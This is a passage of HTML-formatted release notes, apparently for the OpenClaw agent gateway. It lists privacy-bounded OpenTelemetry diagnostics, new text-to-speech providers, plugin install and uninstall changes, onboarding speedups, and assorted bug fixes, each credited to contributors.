<li>Diagnostics/OTEL: surface provider request identifiers as bounded hashes on model-call diagnostics and span events, without exporting raw request IDs or metric labels. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lidang-Jiang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lidang-Jiang">@Lidang-Jiang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/diagnostics: add metadata-only <code>model_call_started</code> and <code>model_call_ended</code> hooks for provider/model call telemetry without exposing prompts, responses, headers, request bodies, or raw provider request IDs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: emit bounded context assembly diagnostics and export <code>openclaw.context.assembled</code> spans with prompt/history sizes but no prompt, history, response, or session-key content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export existing tool-loop diagnostics as <code>openclaw.tool.loop</code> counters and spans without loop messages, session identifiers, params, or tool output. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export diagnostic memory samples and pressure as bounded memory histograms, counters, and pressure spans to help spot leak regressions without session or payload data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add the GenAI <code>gen_ai.client.token.usage</code> histogram for input/output model usage while keeping session identifiers and aggregate cache counters out of the semantic metric. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add a bounded <code>openclaw.agent</code> label to OpenClaw token metrics so per-agent Grafana dashboards can group usage without exporting session identifiers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oc-factus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oc-factus">@oc-factus</a>.</li>
<li>Plugins/install: consolidate managed plugin install metadata into the state-managed plugin index at <code>plugins/installs.json</code>, replacing the temporary <code>plugins/installed-index.json</code> path and removing <code>plugins.installs</code> as an authored config surface. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Diagnostics/OTEL: add the GenAI <code>gen_ai.client.operation.duration</code> histogram for model-call latency in seconds with bounded provider/model/API and error attributes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add GenAI usage token attributes to model-usage spans, including cache read/write input token counts without session identifiers or prompt/response content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: include bounded GenAI operation, provider, and request-model attributes on model-usage spans so token usage remains self-describing without diagnostic identifiers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: keep model-usage span GenAI provider attributes aligned with the existing semantic-convention opt-in policy, using legacy <code>gen_ai.system</code> unless latest experimental GenAI conventions are enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: keep <code>gen_ai.request.model</code> present on GenAI token usage metrics with a bounded <code>unknown</code> fallback when model usage events do not include a model. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Docs/OTEL: document the GenAI token and model-call duration metrics, model-usage span attributes, and <code>OTEL_SEMCONV_STABILITY_OPT_IN=gen_ai_latest_experimental</code> provider-attribute behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Docs: refresh the MCP, model provider, doctor, troubleshooting, BlueBubbles, media generation, TTS, subagents, skills, cron/tasks, exec approvals, and voice-call guides with structured Steps, Tabs, and Accordion content.</li>
<li>Diagnostics/trace: add an internal traceparent propagation helper that only formats trusted dispatcher metadata, keeping plugin-emitted diagnostic traces out of outbound propagation by default. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add bounded outbound message delivery lifecycle diagnostics and export them as low-cardinality delivery spans/metrics without message body, recipient, room, or media-path data. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327526859" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71471" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71471/hovercard" href="https://github.com/openclaw/openclaw/pull/71471">#71471</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Diagnostics/OTEL: emit bounded exec-process diagnostics and export them as <code>openclaw.exec</code> spans without exposing command text, working directories, or container identifiers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327444687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71451/hovercard" href="https://github.com/openclaw/openclaw/pull/71451">#71451</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Diagnostics/OTEL: support <code>OPENCLAW_OTEL_PRELOADED=1</code> so the plugin can reuse an already-registered OpenTelemetry SDK while keeping OpenClaw diagnostic listeners wired. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327404376" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71450" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71450/hovercard" href="https://github.com/openclaw/openclaw/pull/71450">#71450</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Providers/Xiaomi: add MiMo TTS as a bundled speech provider with MP3/WAV output and voice-note Opus transcoding. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116510361" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52376" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52376/hovercard" href="https://github.com/openclaw/openclaw/issues/52376">#52376</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4149888425" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55614" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55614/hovercard" href="https://github.com/openclaw/openclaw/pull/55614">#55614</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zoujiejun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zoujiejun">@zoujiejun</a>.</li>
<li>Providers/ElevenLabs: include <code>eleven_v3</code> in the bundled TTS model catalog so model selection surfaces can offer ElevenLabs v3. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285755724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68321" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68321/hovercard" href="https://github.com/openclaw/openclaw/pull/68321">#68321</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itsuzef/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itsuzef">@itsuzef</a>.</li>
<li>Providers/Local CLI TTS: add a bundled local command speech provider with file/stdout input, voice-note Opus conversion, and telephony PCM output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158165001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56239" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56239/hovercard" href="https://github.com/openclaw/openclaw/pull/56239">#56239</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solar2ain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solar2ain">@solar2ain</a>.</li>
<li>Providers/Inworld: add Inworld as a bundled speech provider with streaming TTS synthesis, voice listing, voice-note output, and PCM telephony output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4155025815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55972/hovercard" href="https://github.com/openclaw/openclaw/pull/55972">#55972</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cshape/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cshape">@cshape</a>.</li>
<li>Providers/Volcengine: add Volcengine/BytePlus Seed Speech as a bundled TTS provider with API-key auth, native Ogg/Opus voice-note output, and MP3 audio-file output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4150318584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55641" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55641/hovercard" href="https://github.com/openclaw/openclaw/pull/55641">#55641</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuruiray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuruiray">@xuruiray</a>.</li>
<li>Android/Talk Mode: expose Talk Mode in the Voice tab with runtime-owned voice capture modes and microphone foreground-service escalation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-latitude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-latitude">@alex-latitude</a>.</li>
<li>Providers/LiteLLM: register <code>litellm</code> as an image-generation provider so <code>image_generate model=litellm/...</code> calls and <code>agents.defaults.imageGenerationModel.fallbacks</code> entries resolve through the LiteLLM proxy. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>Providers/fal: add Seedance 2.0 reference-to-video models with multi-image, video, and audio reference input mapping plus model-specific capability limits for <code>video_generate</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shivanker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shivanker">@shivanker</a>.</li>
<li>Codex harness: require Codex app-server <code>0.125.0</code> or newer and cover native MCP <code>PreToolUse</code>, <code>PostToolUse</code>, and <code>PermissionRequest</code> payloads through the OpenClaw hook relay.</li>
<li>Agents/Codex: teach prompts and <code>agents_list</code> to surface native Codex app-server availability so agents prefer <code>/codex ...</code> over Codex ACP unless ACP/acpx is explicit. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>ACPX/Droid: add Factory Droid to the live ACP bind Docker matrix, including <code>.factory</code> settings staging, <code>FACTORY_API_KEY</code> forwarding, and the single-agent <code>test:docker:live-acp-bind:droid</code> recipe.</li>
<li>TTS/personas: add provider-aware TTS personas with deterministic provider binding merges, <code>/tts persona</code> controls, gateway/CLI persona state, Google Gemini <code>audio-profile-v1</code> prompt wrapping, and OpenAI instruction mapping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318374088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70748" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70748/hovercard" href="https://github.com/openclaw/openclaw/pull/70748">#70748</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barronlroth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barronlroth">@barronlroth</a>.</li>
<li>Voice Wake: add trigger-based routing so macOS voice wake phrases can select a configured agent or session target, with Gateway routing APIs and node update events. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4006394318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/30354" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/30354/hovercard" href="https://github.com/openclaw/openclaw/pull/30354">#30354</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/longbiaochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/longbiaochen">@longbiaochen</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Plugins/CLI: let flag-driven <code>openclaw channels add</code> install the selected channel plugin from its default source without opening an interactive prompt, fixing published npm Telegram setup in stdin-closed automation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/startup: load the default <code>memory-core</code> slot during Gateway startup when permitted so active-memory recall can call <code>memory_search</code> and <code>memory_get</code> without requiring an explicit <code>plugins.slots.memory</code> entry, while preserving <code>plugins.slots.memory: "none"</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/CLI: prefer native require for compiled bundled plugin JavaScript before jiti so read-only config, status, device, and node commands avoid unnecessary transform overhead on slow hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221630999" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62842/hovercard" href="https://github.com/openclaw/openclaw/issues/62842">#62842</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Effet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Effet">@Effet</a>.</li>
<li>Plugins/compat: inventory doctor-side deprecation migrations separately from runtime plugin compatibility so release sweeps preserve needed repairs while enforcing dated removal windows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: add missing dated compatibility records for legacy extension-api, memory registration, provider hook/type aliases, runtime aliases, channel SDK helpers, and approval/test utility shims. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: refresh the persisted registry after managed plugin files are removed so ClawHub uninstall cannot leave stale <code>plugins list</code> entries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/CLI: make plugin install and uninstall config writes conflict-aware, clear stale denylist entries on explicit reinstall/removal, and delete managed plugin files only after config/index commit succeeds. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins: fail <code>plugins update</code> when tracked plugin or hook updates error, keep bundled runtime-dependency repair behind restrictive allowlists, and reject package installs with unloadable extension entries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Gateway/chat: keep duplicate attachment-backed <code>chat.send</code> retries with the same idempotency key on the documented in-flight path so aborts still target the real active run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308621432" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70139" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70139/hovercard" href="https://github.com/openclaw/openclaw/issues/70139">#70139</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Feelw00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Feelw00">@Feelw00</a>.</li>
<li>Plugins: share package entrypoint resolution between install and discovery, reject mismatched <code>runtimeExtensions</code>, and cache bundled runtime-dependency manifest reads during scans. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Onboarding/setup: keep first-run config reads, plugin compatibility notices, and post-model sanity checks on cold metadata paths unless the user chooses to browse all models, avoiding full plugin/runtime catalog work between prompts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/auth: run manifest-owned provider auth choices through scoped setup providers so selecting OpenAI Codex browser/device auth no longer loads every provider runtime before OAuth starts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/auth: keep the post-auth default-model policy lookup on manifest/setup metadata so the next prompt appears without loading broad provider runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/models: keep skip-auth and provider-scoped model picker prompts off the full global model catalog path, and cache provider catalog hook resolution so setup no longer stalls after auth on large plugin registries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Gateway/Bonjour: suppress known @homebridge/ciao cancellation and network assertion failures through scoped process handlers so malformed mDNS packets or restricted VPS networking disable/restart Bonjour instead of crashing the gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274075946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67578" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67578/hovercard" href="https://github.com/openclaw/openclaw/issues/67578">#67578</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zenassist26-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zenassist26-create">@zenassist26-create</a>.</li>
<li>Discord: keep late clicks on already-resolved exec approval buttons quiet when elevated mode auto-resolved the request, while still surfacing real approval submission failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265667453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66906/hovercard" href="https://github.com/openclaw/openclaw/issues/66906">#66906</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rlerikse/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rlerikse">@rlerikse</a>.</li>
<li>Agents/subagents: deliver completed yielded-subagent results back to no-thread requester routes via direct fallback when the dormant parent announce turn produces no visible reply, and add QA-lab coverage for the regression. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/Tailscale: let Tailscale-authenticated Control UI operator sessions with browser device identity skip the device-pairing round trip while still rejecting device-less and node-role connections. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330113557" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71986/hovercard" href="https://github.com/openclaw/openclaw/issues/71986">#71986</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jokedul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jokedul">@jokedul</a>.</li>
<li>Doctor: honor <code>OPENCLAW_SERVICE_REPAIR_POLICY=external</code> by reporting gateway service health while skipping service install/start/restart/bootstrap, supervisor rewrites, and legacy service cleanup for externally managed environments. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: run package post-update doctor with <code>--fix</code> so package updates repair config migrations before restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: retry failed npm global updates with <code>--omit=optional</code> and ignore the superseded first failure when the fallback succeeds. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/uninstall: migrate and reset <code>plugins.slots.contextEngine</code> alongside memory slots when plugin ids change or selected plugins are removed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Discord: keep raw <code>Agent failed before reply</code> runner failures out of Discord group/channel chats and show detailed runner errors in direct chats only when <code>/verbose</code> is enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>UI/Windows: quote resolved pnpm <code>.cmd</code> launcher paths before spawning UI install/build/test commands so Node installs under <code>C:\Program Files</code> no longer fail as <code>C:\Program</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072094242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45275" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45275/hovercard" href="https://github.com/openclaw/openclaw/issues/45275">#45275</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobevictor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobevictor">@Kobevictor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stoppieboy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stoppieboy">@stoppieboy</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iubns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iubns">@iubns</a>.</li>
<li>Codex/agent: translate <code>--thinking minimal</code> to <code>low</code> for modern Codex models (gpt-5.5, gpt-5.4, gpt-5.4-mini, gpt-5.2) at request build time so the first turn is accepted instead of paying a wasted call + retry-with-low fallback. Older Codex models still receive <code>minimal</code> directly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329994264" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71946" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71946/hovercard" href="https://github.com/openclaw/openclaw/issues/71946">#71946</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Plugins/uninstall: remove tracked plugin files from their recorded managed extensions root even when the current state directory points somewhere else, so <code>openclaw plugins uninstall --force</code> does not leave the plugin discoverable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/runtime: add <code>agentRuntime.id</code> as the canonical config key, migrate legacy runtime-policy configs with <code>openclaw doctor --fix</code>, route canonical Anthropic models through <code>claude-cli</code> without passing CLI backend aliases to embedded harness selection, and load CLI backend owner plugins before channel startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330015913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71957" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71957/hovercard" href="https://github.com/openclaw/openclaw/issues/71957">#71957</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>CLI/update: guard Windows scheduled-task stops by state and timeout so auto-update restart cannot hang indefinitely on <code>schtasks /End</code> before stale-listener cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306617089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69970" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69970/hovercard" href="https://github.com/openclaw/openclaw/issues/69970">#69970</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yangswld/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yangswld">@yangswld</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sherlock-huang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sherlock-huang">@sherlock-huang</a>.</li>
